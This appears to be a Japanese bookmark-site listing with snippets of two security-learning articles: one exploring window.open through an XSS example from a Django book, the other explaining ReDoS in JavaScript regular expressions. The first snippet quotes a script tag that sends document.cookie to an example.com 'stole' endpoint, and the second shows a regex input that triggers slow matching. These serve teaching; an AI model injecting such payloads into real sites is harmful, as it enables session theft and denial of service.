XSSの例に登場するJavaScriptのopen(window.open)を理解したく手を動かす - nikkie-ftnextの日記
はじめに 豊洲ユナイテッドシネマ埋めるぞ!(ミリアニはいいぞ) nikkieです。 今回は小さな素振り記事です。 目次 はじめに 目次 window.open 開発ツールで動作確認 openする先のWireMockを用意 XSS脆弱性のあるDjangoアプリにopenを埋め込む 終わりに window.open 『実践Django』のXSS脆弱性の例で知りました。 openを使ってクッキーを送信するコードが実行される例が紹介されます(Kindle版 p.297 より)。 <script>open('http://example.com/stole?cookie='+escape(document.cookie));</script> このopen関数自体がよく分かっていなかったので今回素振りしました。 open() は Window インターフェイスのメソッドで、指定されたリソースを、新し
正規表現の脆弱性 (ReDoS) を JavaScript で学ぶ
先日、このようなツイートを書いたところ、かなりの反響がありました。 JavaScript の正規表現の脆弱性の例でいうと、例えば /\s+$/ は脆弱性があると言える console.time(); /\s+$/.test(" ".repeat(65536) + "a"); console.timeEnd(); 結構時間がかかるのがわかる。でも /\s+$/ を見て「これは危険だな」と理解出来る人はそんなにいない。JavaScript に限らないけれど。 — Takuo Kihira (@tkihira) February 17, 2022 これは一般に ReDoS (Regular expression Denial of Service) と呼ばれる脆弱性です。正確に理解するのが難しい脆弱性なので、少し解説してみたいと思います。 結論 長い記事になるので、最初に「とりあえずこれだけ知っ
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
